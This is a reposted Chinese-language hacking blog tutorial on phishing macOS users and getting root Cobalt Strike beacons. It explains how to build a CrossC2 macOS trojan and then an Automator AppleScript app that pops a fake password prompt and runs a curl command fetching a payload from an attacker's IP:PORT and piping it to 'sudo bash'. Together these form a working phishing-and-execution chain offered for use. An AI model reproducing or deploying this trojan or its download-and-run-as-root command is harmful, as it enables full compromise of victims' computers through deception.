实战 | 钓鱼苹果电脑并Root权限上线CS
2022-12-4 11:22:20 Author: HACK学习君(查看原文) 阅读量:20 收藏

制作MACOS的马

一、下载工具

首先从github上下载CrossC2。链接:https://github.com/gloxec/CrossC2/releases/tag/v3.1.0。

根据你CS客户端的操作系统选择这里面的对应版本,以及CorssC2-githubBot-2022-06-07.cna这个CS插件。

二、CrossC2使用

首先用编辑器打开CorssC2-githubBot-2022-06-07.cna插件。

将红色框出来的位置填上CrossC2
可执行文件的绝对路径(linux和mac版本要使用chmod +x 添加执行权限)。

然后去CS中添加插件即可。


注意:这里的linster要用https的监听。

在生成木马时一定要注意需要将cs服务端中的.cobaltstrike.beacon_keys复制到客户端上,在红框处选中文件即可。

这里的ProcessName是木马启动后在主机上的进程名,然后点机Build即可。在CS的log中会出现一个curl的命令,只需在被攻击机上执行便会上线。

三、Root Mac app木马的制作

1、工具

2、木马创建

打开automator.app,并且点击到运行Applescript。

这是我们的木马程序,大致意思是执行我们的木马程序并且以root身份执行(此处的代码是从mac官方找到的模版)。

set unixDesktopPath to POSIX path of "/System/Library/User Template/"
set quotedUnixDesktopPath to quoted form of unixDesktopPath
set fromUnix to do shell script " curl \-A O \-o\- \-L http://IP:PORT/a \|sudo bash \-s " & quotedUnixDesktopPath with administrator privileges

end ru

制作好后点击保存即可

3、运行

当点击这里的制作好的app程序会弹出输入密码的提示框(这里是做钓鱼时使用的木马,弹窗的名字都是以任意更改的)。

当一输入密码就会上线到我们的CS上,此时CS上的用户是root。

来源:https://www.freebuf.com/articles/web/350592.html作者:AimerG如有侵权,请联系删除


推荐阅读

实战 | 记一次渗透拿下某儿童色情网站的经过

实战 | 某某街一处XSS的绕过思路

实战 | 记一次企业钓鱼演练

2022年,从现在开始学安全还不迟!

干货 | 2022年超全的安全知识库

实战 | 实战一次完整的BC网站渗透测试

星球部分精华内容推荐

其他更多精彩内容,欢迎加入我们的星球


文章来源: http://mp.weixin.qq.com/s?__biz=MzIzNzMxMDkxNw==&mid=2247491902&idx=1&sn=46c9e2cf0151cf852bef3555eb96de19&chksm=e8c82794dfbfae82c0601b13ad6cc8f71599cbdfb83509451f17bd540e9f9bcec4821522095e#rd
如有侵权请联系:admin#unsafe.sh